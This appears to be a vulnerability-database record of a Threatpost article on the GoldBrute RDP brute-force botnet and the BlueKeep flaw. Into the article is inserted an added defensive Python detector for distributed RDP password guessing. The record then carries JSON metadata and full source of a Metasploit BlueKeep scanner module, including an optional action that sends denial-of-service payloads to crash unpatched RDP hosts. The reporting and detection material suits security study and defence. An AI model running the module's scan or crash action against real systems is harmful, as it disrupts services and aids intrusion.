ID THREATPOST:BDEA819E4532E0D1FA016778F659F7E8 Type threatpost Reporter Tara Seals Modified 2019-06-07T17:15:57
Description
While everyone’s talking about the BlueKeep Mega-Worm, it is not the main monster to fear, judging by recent attack activity. Rather, a researcher is warning that the GoldBrute botnet poses the greatest threat to internet-exposed Windows systems right now.
In the past few days, GoldBrute (named after the Java class it uses) has attempted to brute-force Remote Desktop Protocol (RDP) logins on 1.5 million Windows systems and counting, according to Morphus Labs chief research officer Renato Marinho. The botnet is actively scanning the internet for machines with RDP exposed and trying weak or reused passwords against them to gain access.
After initially spotting the activity earlier this week, “after six hours, we received 2.1 million IP addresses from the C2 server from which 1,596,571 are unique,” Marinho wrote in a posting on Thursday, adding that the botnet continues to swell in size (though he didn’t quantify it). There are plenty of hosts to be had: Shodan reveals nearly 2.5 million exposed RDP instances as of this writing.
The danger could be extensive. RDP is used by tech support and IT admins to connect to and interact with machines remotely; it’s also sometimes used by teleworking employees. Once an attacker authenticates, he or she has an interactive Windows desktop session and can do anything the compromised account has permission to do. Obviously, pivoting into corporate networks, implanting malware, stealing information, and marshaling CPU resources for cryptomining or distributed denial-of-service attacks could all be on the cyberattack menu du jour for the GoldBrute operators.
GoldBrute distribution as of June 6, 2019.
Speaking of whom, it turns out that the GoldBrute botnet is controlled by a single command-and-control (C2) server, associated with an IP address in New Jersey. These adversaries could in theory carry all of the aforementioned attacks out on a large scale, all at once.
According to the researcher, the C2 exchanges data with the bots over AES-encrypted WebSocket connections to port 8333. An infected system is first instructed to download the bot code (a very large 80MB package that bundles a complete Java Runtime, Marinho said); once running, it scans random IP addresses for further hosts with RDP exposed and reports those addresses back to the C2.
“After the bot reports 80 new victims, the C2 server will assign a set of targets to brute-force to the bot,” Marinho said. “Each bot will only try one particular username and password per target. This is possibly a strategy to fly under the radar of security tools, as each authentication attempt comes from different addresses.”
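The detection consequence of that one-guess-per-source strategy is worth seeing concretely. The following is an added example, not code from the article or from Morphus Labs: a small detector run over constructed log lines modelled on Windows Event ID 4625 (failed logon) with logon type 10 (RemoteInteractive, i.e. RDP). The log format, host names, user names and RFC 5737 test addresses are all assumptions made for the example. A classic per-source threshold catches a single IP hammering one host but is blind to GoldBrute, where each source makes exactly one attempt; aggregating by target host and counting distinct sources catches it.

```python
"""Added example: per-source vs per-target detection of RDP credential guessing."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed line format (not the real Windows event export):
# <iso-timestamp> host=<target> event=<id> logon_type=<n> user=<name> src=<ip>
LINE_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) event=(?P<event>\d+) "
    r"logon_type=(?P<ltype>\d+) user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def build_sample_log():
    """Constructed sample data: one host hit GoldBrute-style, one hit classically."""
    lines = []
    base = datetime(2019, 6, 6, 10, 0, 0)
    users = ["administrator", "admin", "user", "test", "backup", "scan"]
    # rdp-srv01: 12 different sources, one failed guess each (GoldBrute pattern)
    for i in range(12):
        ts = (base + timedelta(seconds=25 * i)).isoformat()
        lines.append(f"{ts} host=rdp-srv01 event=4625 logon_type=10 "
                     f"user={users[i % len(users)]} src=203.0.113.{10 + i}")
    # rdp-srv02: a single source making 8 failed guesses (classic brute force)
    for i in range(8):
        ts = (base + timedelta(seconds=15 * i)).isoformat()
        lines.append(f"{ts} host=rdp-srv02 event=4625 logon_type=10 "
                     f"user=administrator src=192.0.2.5")
    # Noise that must be ignored: a successful RDP logon and a console failure.
    lines.append(f"{base.isoformat()} host=rdp-srv01 event=4624 logon_type=10 user=alice src=198.51.100.7")
    lines.append(f"{base.isoformat()} host=rdp-srv02 event=4625 logon_type=2 user=bob src=-")
    return "\n".join(lines)


SAMPLE_LOG = build_sample_log()


def parse(log_text):
    """Parse the constructed format into dicts; lines that do not match are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append({"ts": datetime.fromisoformat(m["ts"]), "host": m["host"],
                       "event": int(m["event"]), "ltype": int(m["ltype"]),
                       "user": m["user"], "src": m["src"]})
    return events


def rdp_failures(events):
    """Keep only failed logons (4625) over RDP (logon type 10)."""
    return [e for e in events if e["event"] == 4625 and e["ltype"] == 10]


def per_source_alerts(events, threshold=5, window=timedelta(minutes=10)):
    """Classic detector: one source IP with >= threshold failures on one host in the window."""
    by_pair = defaultdict(list)
    for e in rdp_failures(events):
        by_pair[(e["host"], e["src"])].append(e["ts"])
    alerts = {}
    for (host, src), times in by_pair.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts[(host, src)] = end - start + 1
                break
    return alerts


def per_target_alerts(events, min_sources=10, max_per_source=1, window=timedelta(minutes=10)):
    """GoldBrute-style detector: aggregate by target host and alert when many
    distinct sources each make at most max_per_source attempts in the window."""
    by_host = defaultdict(list)
    for e in rdp_failures(events):
        by_host[e["host"]].append(e)
    alerts = {}
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            window_evs = evs[start:end + 1]
            per_src = defaultdict(int)
            for e in window_evs:
                per_src[e["src"]] += 1
            if len(per_src) >= min_sources and max(per_src.values()) <= max_per_source:
                best = alerts.get(host)
                if best is None or len(per_src) > best["sources"]:
                    alerts[host] = {"sources": len(per_src),
                                    "users": len({e["user"] for e in window_evs})}
    return alerts


if __name__ == "__main__":
    evs = parse(SAMPLE_LOG)
    print("per-source:", per_source_alerts(evs))   # fires only for rdp-srv02
    print("per-target:", per_target_alerts(evs))   # fires only for rdp-srv01
```

The per-source detector never sees more than one failure from any GoldBrute node, so rdp-srv01 is invisible to it, while the per-target detector flags the host on the spread of sources alone. In production the same grouping applies to a SIEM query over 4625 events, with the thresholds tuned to the host's normal failed-logon rate.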
The virulence of the activity should give admins pause, he added: “While the reporting around this ‘Bluekeep’ vulnerability focused on patching vulnerable servers, exposing RDP to the internet has never been a good idea.”
The BlueKeep critical remote code-execution vulnerability (CVE-2019-0708), for which a fully functioning exploit has been developed (but kept private by researchers), also lays open remote desktop services for attack. It’s widely seen as the next big corporate threat, because it’s wormable and requires no user interaction to spread. That’s prompted the National Security Agency to warn of a potential WannaCry-level event.
However, researchers at Duo Security pointed out that if the goal is to infiltrate via remote desktop, GoldBrute is the far easier route to go.
“GoldBrute highlights the fact that the bulk of scanning activity for RDP isn’t BlueKeep related,” they wrote in a posting on Thursday. “When attackers can just bypass locked screens or guess weak RDP credentials, IT departments need to focus on making sure machines are not unnecessarily exposing RDP on the internet (putting a layer in between, such as a VPN, would help) and that users know how to use RDP properly.”
That said, patching the BlueKeep flaw, which affects older versions of Windows, including Windows 7, Windows XP, Server 2003, Server 2008 and Server 2008 R2, should also be at the top of the to-do list; millions of systems remain vulnerable to it. Where patching is delayed, enabling Network Level Authentication (NLA) on RDP requires the client to authenticate before the session is set up and so mitigates BlueKeep, but it does nothing to stop credential guessing of the kind GoldBrute performs.
{"id": "THREATPOST:BDEA819E4532E0D1FA016778F659F7E8", "type": "threatpost", "bulletinFamily": "info", "title": "Forget BlueKeep: Beware the GoldBrute", "description": "While everyone\u2019s talking about the [BlueKeep Mega-Worm](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>), this is not the main monster to fear, according to recent web attack activity. Rather, a researcher is warning that the GoldBrute botnet poses the greatest threat to Windows systems right now.\n\nIn the past few days, GoldBrute (named after the Java class it uses) has attempted to brute-force Remote Desktop Protocol (RDP) connections for 1.5 million Windows systems and counting, according to Morphus Labs chief research officer Renato Marinho. The botnet is actively scanning the internet for machines with RDP exposed, and trying out weak or reused passwords to see if it can gain access to the systems.\n\nAfter initially spotting the activity earlier this week, \u201cafter six hours, we received 2.1 million IP addresses from the C2 server from which 1,596,571 are unique,\u201d Marinho wrote [in a posting](<https://morphuslabs.com/goldbrute-botnet-brute-forcing-1-5-million-rdp-servers-371f219ec37d>) on Thursday, adding that the botnet continues to swell in size (though he didn\u2019t quantify it). There are plenty of hosts to be had: Shodan reveals nearly 2.5 million [exposed RDP instances](<https://www.shodan.io/search?query=Remote+desktop>) as of this writing.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe danger could be extensive \u2014 RDP is used by tech support and IT admins to connect to and interact with machines remotely; it\u2019s also sometimes used by teleworking employees. Once an attacker has access to the connection, he or she has access to the Windows desktop and can set about doing anything the legitimate user would have permission to do. 
Obviously, pivoting into corporate networks, implanting malware, stealing information, and marshaling CPU resources for cryptomining or distributed denial-of-service attacks could all be on the cyberattack menu du jour for the GoldBrute operators.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/06/07120809/GoldBrute.png>)\n\nGoldBrute distribution as of June 6, 2019.\n\nSpeaking of whom, it turns out that the GoldBrute botnet is controlled by a single command-and-control (C2) server, associated with [an IP address in New Jersey](<https://myip.ms/view/ip_addresses/1755117824>). These adversaries could in theory carry all of the aforementioned attacks out on a large scale, all at once.\n\nAccording to the researcher, the C2 is exchanging data with the bots via AES-encrypted WebSocket connections to port 8333. An infected system will first be instructed to download the bot code (which is a very large 80MB package that includes the complete Java Runtime, Marinho said); once it has burrowed into its host, it starts scanning random IP addresses to find more hosts, and reporting the IP addresses back to the C2.\n\n\u201cAfter the bot reports 80 new victims, the C2 server will assign a set of targets to brute-force to the bot,\u201d Marinho said. \u201cEach bot will only try one particular username and password per target. This is possibly a strategy to fly under the radar of security tools, as each authentication attempt comes from different addresses.\u201d\n\nThe virulence of the activity should give admins pause, he added: \u201cWhile the reporting around this \u2018Bluekeep\u2019 vulnerability focused on patching vulnerable servers, exposing RDP to the internet has never been a good idea.\u201d\n\nThe BlueKeep critical remote code-execution vulnerability (CVE-2019-0708), for which a fully functioning exploit has been developed (but kept private by researchers), also lays open remote desktop services for attack. 
It\u2019s widely seen as the next big corporate threat, because it\u2019s wormable and requires no user interaction to spread. That\u2019s prompted the National Security Agency to warn of a potential [WannaCry-level event](<https://threatpost.com/the-wannacry-security-legacy-and-whats-to-come/144607/>).\n\nHowever, researchers at Duo Security pointed out that if the goal is to infiltrate via remote desktop, GoldBrute is the far easier route to go.\n\n\u201cGoldBrute highlights the fact that the bulk of scanning activity) for RDP isn\u2019t BlueKeep related,\u201d they wrote [in a posting](<https://duo.com/decipher/goldbrute-botnet-is-brute-forcing-windows-rdp>) on Thursday. \u201cWhen attackers can just bypass locked screens or guess weak RDP credentials, IT departments need to focus on making sure machines are not unnecessarily exposing RDP on the internet (putting a layer in between, such as a VPN, would help) and that users know how to use RDP properly.\u201d\n\nThat said, [patching the BlueKeep flaw](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) \u2013 which affects older version of Windows, including Windows 7, Windows XP, Server 2003, Server 2008 and Server 2008 R2 \u2013 should obviously also be on the top of the to-do list. Millions of systems remain vulnerable to it.\n\n**_Ransomware is on the rise: _**[**_Don\u2019t miss our free Threatpost webinar _**](<https://attendee.gotowebinar.com/register/611039692762707715?source=enews>)**_on the ransomware threat landscape, June 19 at 2 p.m. ET. 
_****_Join _****_Threatpost _****_and a panel of experts as they discuss_****_ how to manage the risk associated with this unique attack type,_** **_with exclusive insights into new developments on the ransomware front and how to stay ahead of the attackers._**\n", "published": "2019-06-07T17:15:57", "modified": "2019-06-07T17:15:57", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://threatpost.com/forget-bluekeep-beware-goldbrute/145482/", "reporter": "Tara Seals", "references": ["https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/", "https://morphuslabs.com/goldbrute-botnet-brute-forcing-1-5-million-rdp-servers-371f219ec37d", "https://www.shodan.io/search?query=Remote+desktop", "https://threatpost.com/newsletter-sign/", "https://media.threatpost.com/wp-content/uploads/sites/103/2019/06/07120809/GoldBrute.png", "https://myip.ms/view/ip_addresses/1755117824", "https://threatpost.com/the-wannacry-security-legacy-and-whats-to-come/144607/", "https://duo.com/decipher/goldbrute-botnet-is-brute-forcing-windows-rdp", "https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/", "https://attendee.gotowebinar.com/register/611039692762707715?source=enews"], "cvelist": ["CVE-2019-0708"], "lastseen": "2020-04-11T11:45:39", "viewCount": 312, "enchantments": {"score": {"value": 4.5, "vector": "NONE", "modified": "2020-04-11T11:45:39", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-0708"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP/", "MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP", "MSF:EXPLOIT/WINDOWS/RDP/CVE_2019_0708_BLUEKEEP_RCE/", "MSF:EXPLOIT/WINDOWS/RDP/CVE_2019_0708_BLUEKEEP_RCE"]}, {"type": "f5", "idList": ["F5:K25238311"]}, {"type": "msrc", "idList": ["MSRC:4D3D99779455BE99499289F3B3A35F84", "MSRC:6A6ED6A5B652378DCBA3113B064E973B"]}, {"type": "kitploit", "idList": 
["KITPLOIT:1986765330027575502", "KITPLOIT:8418780960315245103", "KITPLOIT:7915799087007906859", "KITPLOIT:1049860926455958760", "KITPLOIT:1225614657733366094", "KITPLOIT:3565898196234868215", "KITPLOIT:8309365460568193500", "KITPLOIT:998955151150716619", "KITPLOIT:6082359615438809301", "KITPLOIT:4482238198881011483"]}, {"type": "symantec", "idList": ["SMNTC-108273"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108611", "OPENVAS:1361412562310814894"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994234", "MYHACK58:62201994152", "MYHACK58:62201994162", "MYHACK58:62201995234", "MYHACK58:62201994154", "MYHACK58:62201994259", "MYHACK58:62201994153", "MYHACK58:62201995881"]}, {"type": "ics", "idList": ["ICSMA-20-049-01"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153133", "PACKETSTORM:154579"]}, {"type": "talosblog", "idList": ["TALOSBLOG:2401133934B407D6B7E1C6D91E886EBA", "TALOSBLOG:8DB6614E6048947EDBBD91681EE32AB7", "TALOSBLOG:2FC8F90E015AB54A7397D49B24BE5B5E", "TALOSBLOG:340B43701E5CA96D8B4491CD801FE010", "TALOSBLOG:E1AA5BBE6ECD7FF1CDF68AD1858BAA5A", "TALOSBLOG:F707E3F271E987A8739DBDECFEEFAE22", "TALOSBLOG:5A9BEF09DC8FF93E258E2D51361D11E8", "TALOSBLOG:C6C252288047D319ADE770A26A8DA196", "TALOSBLOG:AE189A67BCAD633AD9D7838F9DF4F6D5", "TALOSBLOG:62182E90D88C9282869F40D834CA56BA"]}, {"type": "threatpost", "idList": ["THREATPOST:08D7AB11C0B2B0668D71ADCEEB94DB1B", "THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:78996437466E037C7F29EFB1FFBBAB42", "THREATPOST:0D8008A1EF72C3A6059283D0D896B819", "THREATPOST:65FCA3BAD00F90651C42A5E6B1A291C3", "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "THREATPOST:472451689B2FA39FCB837D08B514FF91", "THREATPOST:54B8C2E27967886BC5CF55CA1E891C6C"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7549D87CE6E6AE596B8031184231ECD1"]}, {"type": "thn", "idList": ["THN:1BA2E3EE721856ECEE43B825656909B0", "THN:39C614DBFC7ED1BBBEAAD9DC8C04C7CD", "THN:3D0ED27488E8AFC91D99882663F7E35A"]}, {"type": "mssecure", "idList": 
["MSSECURE:B42B640CBAB51E35DC07B81926B5F910", "MSSECURE:E0AA6CC56D602890BBD5AF46A036FE67"]}, {"type": "cisa", "idList": ["CISA:A5265FFF4C417EB767D82231D2D604B8", "CISA:81A1472B76D72ABF1AA69524AFD40F34"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20190529-01-WINDOWS"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:83C94B14C546544713E49B16CCCBF672"]}, {"type": "zdt", "idList": ["1337DAY-ID-33565", "1337DAY-ID-32978"]}, {"type": "exploitdb", "idList": ["EDB-ID:46946", "EDB-ID:47416", "EDB-ID:46904"]}, {"type": "mscve", "idList": ["MS:CVE-2019-0708"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:AE1D32AF43539C7362B2E060204A5413", "QUALYSBLOG:400D28FE44174674BB4561AA9416F532"]}, {"type": "nessus", "idList": ["SMB_NT_MS19_MAY_XP_2003.NASL"]}, {"type": "canvas", "idList": ["BLUEKEEP"]}, {"type": "attackerkb", "idList": ["AKB:131226A6-A1E9-48A1-A5D0-AC94BAF8DFD2"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C90C58C22E53621B5A2A2AAEBCDF2EBC"]}], "modified": "2020-04-11T11:45:39", "rev": 2}, "vulnersScore": 4.5}}
{"cve": [{"lastseen": "2021-02-02T07:12:44", "description": "A remote code execution vulnerability exists in Remote Desktop Services formerly known as Terminal Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka 'Remote Desktop Services Remote Code Execution Vulnerability'.", "edition": 11, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-05-16T19:29:00", "title": "CVE-2019-0708", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0708"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:microsoft:windows_vista:-", "cpe:/o:microsoft:windows_server_2003:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_xp:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2003:r2", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2019-0708", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-0708", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2003:-:sp2:*:*:*:*:x86:*", 
"cpe:2.3:o:microsoft:windows_xp:-:sp3:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_server_2003:r2:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_xp:-:sp2:*:*:professional:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2003:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*"]}], "metasploit": [{"lastseen": "2021-02-13T04:54:30", "description": "This module checks a range of hosts for the CVE-2019-0708 vulnerability by binding the MS_T120 channel outside of its normal slot and sending non-DoS packets which respond differently on patched and vulnerable hosts. It can optionally trigger the DoS vulnerability.\n", "published": "2019-06-03T14:38:12", "type": "metasploit", "title": "CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-0708"], "modified": "2020-06-22T11:48:39", "id": "MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::RDP\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check',\n 'Description' => %q{\n This module checks a range of hosts for the CVE-2019-0708 vulnerability\n by binding the MS_T120 channel outside of its normal slot and sending\n non-DoS packets which respond differently on patched and vulnerable hosts.\n It can optionally trigger the DoS vulnerability.\n },\n 'Author' =>\n [\n 'National Cyber Security Centre', # Discovery\n 'JaGoTu', # 
Module\n 'zerosum0x0', # Module\n 'Tom Sellers' # TLS support, packet documenentation, DoS implementation\n ],\n 'References' =>\n [\n [ 'CVE', '2019-0708' ],\n [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708' ],\n [ 'URL', 'https://zerosum0x0.blogspot.com/2019/05/avoiding-dos-how-bluekeep-scanners-work.html' ]\n ],\n 'DisclosureDate' => '2019-05-14',\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Scan', 'Description' => 'Scan for exploitable targets'],\n ['Crash', 'Description' => 'Trigger denial of service vulnerability'],\n ],\n 'DefaultAction' => 'Scan',\n 'Notes' =>\n {\n 'Stability' => [ CRASH_SAFE ],\n 'AKA' => ['BlueKeep']\n }\n )\n )\n end\n\n def report_goods\n report_vuln(\n host: rhost,\n port: rport,\n proto: 'tcp',\n name: name,\n info: 'Behavior indicates a missing Microsoft Windows RDP patch for CVE-2019-0708',\n refs: references\n )\n end\n\n def run_host(ip)\n # Allow the run command to call the check command\n\n status = check_host(ip)\n if status == Exploit::CheckCode::Vulnerable\n print_good(status[1].to_s)\n elsif status == Exploit::CheckCode::Safe\n vprint_error(status[1].to_s)\n else\n vprint_status(status[1].to_s)\n end\n\n status\n end\n\n def rdp_reachable\n rdp_connect\n rdp_disconnect\n return true\n rescue Rex::ConnectionRefused\n return false\n rescue Rex::ConnectionTimeout\n return false\n end\n\n def check_host(_ip)\n # The check command will call this method instead of run_host\n status = Exploit::CheckCode::Unknown\n\n begin\n begin\n rdp_connect\n rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError\n return Exploit::CheckCode::Safe('The target service is not running or refused our connection.')\n end\n\n status = check_rdp_vuln\n rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError, ::TypeError => e\n bt = 
e.backtrace.join(\"\\n\")\n vprint_error(\"Unexpected error: #{e.message}\")\n vprint_line(bt)\n elog(e)\n rescue RdpCommunicationError\n vprint_error('Error communicating RDP protocol.')\n status = Exploit::CheckCode::Unknown\n rescue Errno::ECONNRESET\n vprint_error('Connection reset')\n rescue StandardError => e\n bt = e.backtrace.join(\"\\n\")\n vprint_error(\"Unexpected error: #{e.message}\")\n vprint_line(bt)\n elog(e)\n ensure\n rdp_disconnect\n end\n\n status\n end\n\n def check_for_patch\n begin\n 6.times do\n _res = rdp_recv\n end\n rescue RdpCommunicationError\n # we don't care\n end\n\n # The loop below sends Virtual Channel PDUs (2.2.6.1) that vary in length\n # The arch governs which of the packets triggers the desired response\n # which is an MCS Disconnect Provider Ultimatum or a timeout.\n\n # Disconnect Provider message of a valid size for each platform\n # has proven to be safe to send as part of the vulnerability check.\n x86_string = '00000000020000000000000000000000'\n x64_string = '0000000000000000020000000000000000000000000000000000000000000000'\n\n if action.name == 'Crash'\n vprint_status('Sending denial of service payloads')\n # Length and chars are arbitrary but total length needs to be longer than\n # 16 for x86 and 32 for x64. Making the payload too long seems to cause\n # the DoS to fail. Note that sometimes the DoS seems to fail. Increasing\n # the payload size and sending more of them doesn't seem to improve the\n # reliability. It *seems* to happen more often on x64, I haven't seen it\n # fail against x86. 
Repeated attempts will generally trigger the DoS.\n x86_string += 'FF' * 1\n x64_string += 'FF' * 2\n else\n vprint_status('Sending patch check payloads')\n end\n\n chan_flags = RDPConstants::CHAN_FLAG_FIRST | RDPConstants::CHAN_FLAG_LAST\n channel_id = [1005].pack('S>')\n x86_packet = rdp_build_pkt(build_virtual_channel_pdu(chan_flags, [x86_string].pack('H*')), channel_id)\n\n x64_packet = rdp_build_pkt(build_virtual_channel_pdu(chan_flags, [x64_string].pack('H*')), channel_id)\n\n 6.times do\n rdp_send(x86_packet)\n rdp_send(x64_packet)\n\n # A single pass should be sufficient to cause DoS\n if action.name == 'Crash'\n sleep(1)\n rdp_disconnect\n\n sleep(5)\n if rdp_reachable\n print_error(\"Target doesn't appear to have been crashed. Consider retrying.\")\n return Exploit::CheckCode::Unknown\n else\n print_good('Target service appears to have been successfully crashed.')\n return Exploit::CheckCode::Vulnerable('The target appears to have been crashed by disconnecting from an incorrectly-bound MS_T120 channel.')\n end\n end\n\n # Quick check for the Ultimatum PDU\n begin\n res = rdp_recv(-1, 1)\n rescue EOFError\n # we don't care\n end\n return Exploit::CheckCode::Vulnerable('The target attempted cleanup of the incorrectly-bound MS_T120 channel.') if res&.include?(['0300000902f0802180'].pack('H*'))\n\n # Slow check for Ultimatum PDU. 
If it doesn't respond in a timely\n # manner then the host is likely patched.\n begin\n 4.times do\n res = rdp_recv\n # 0x2180 = MCS Disconnect Provider Ultimatum PDU - 2.2.2.3\n if res.include?(['0300000902f0802180'].pack('H*'))\n return Exploit::CheckCode::Vulnerable('The target attempted cleanup of the incorrectly-bound MS_T120 channel.')\n end\n end\n rescue RdpCommunicationError\n # we don't care\n end\n end\n\n Exploit::CheckCode::Safe\n end\n\n def check_rdp_vuln\n # check if rdp is open\n is_rdp, version_info = rdp_fingerprint\n unless is_rdp\n vprint_error('Could not connect to RDP service.')\n return Exploit::CheckCode::Unknown\n end\n rdp_disconnect\n rdp_connect\n is_rdp, server_selected_proto = rdp_check_protocol\n\n requires_nla = [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include? server_selected_proto\n product_version = (version_info && version_info[:product_version]) ? version_info[:product_version] : 'N/A'\n info = \"Detected RDP on #{peer} (Windows version: #{product_version})\"\n\n service_info = \"Requires NLA: #{(!version_info[:product_version].nil? && requires_nla) ? 
'Yes' : 'No'}\"\n info << \" (#{service_info})\"\n\n vprint_status(info)\n\n if requires_nla\n vprint_status('Server requires NLA (CredSSP) security which mitigates this vulnerability.')\n return Exploit::CheckCode::Safe\n end\n\n chans = [\n ['cliprdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_T120', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_COMPRESS_RDP],\n ['rdpsnd', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],\n ['snddbg', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],\n ['rdpdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_COMPRESS_RDP],\n ]\n\n success = rdp_negotiate_security(chans, server_selected_proto)\n return Exploit::CheckCode::Unknown unless success\n\n rdp_establish_session\n\n result = check_for_patch\n\n if result == Exploit::CheckCode::Vulnerable\n report_goods\n end\n\n # Can't determine, but at least we know the service is running\n result\n end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb"}, {"lastseen": "2020-10-13T17:08:23", "description": "This module checks a range of hosts for the CVE-2019-0708 vulnerability by binding the MS_T120 channel outside of its normal slot and sending non-DoS packets which respond differently on patched and vulnerable hosts. 
It can optionally trigger the DoS vulnerability.\n", "published": "2019-06-03T14:38:12", "type": "metasploit", "title": "CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-0708"], "modified": "2020-06-22T11:48:39", "id": "MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::RDP\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check',\n 'Description' => %q{\n This module checks a range of hosts for the CVE-2019-0708 vulnerability\n by binding the MS_T120 channel outside of its normal slot and sending\n non-DoS packets which respond differently on patched and vulnerable hosts.\n It can optionally trigger the DoS vulnerability.\n },\n 'Author' =>\n [\n 'National Cyber Security Centre', # Discovery\n 'JaGoTu', # Module\n 'zerosum0x0', # Module\n 'Tom Sellers' # TLS support, packet documenentation, DoS implementation\n ],\n 'References' =>\n [\n [ 'CVE', '2019-0708' ],\n [ 'URL', 